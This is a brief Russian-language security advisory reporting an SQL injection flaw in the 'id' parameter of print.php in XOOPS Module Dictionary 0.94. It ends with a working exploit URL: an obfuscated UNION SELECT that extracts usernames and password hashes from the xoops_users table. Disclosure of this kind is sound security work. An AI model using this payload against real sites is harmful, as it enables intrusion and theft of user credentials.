Программа: XOOPS Module Dictionary 0.94
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием print.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
modules/dictionary/print.php?id=-9999999/**/union/* */select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/* */xoops_users/*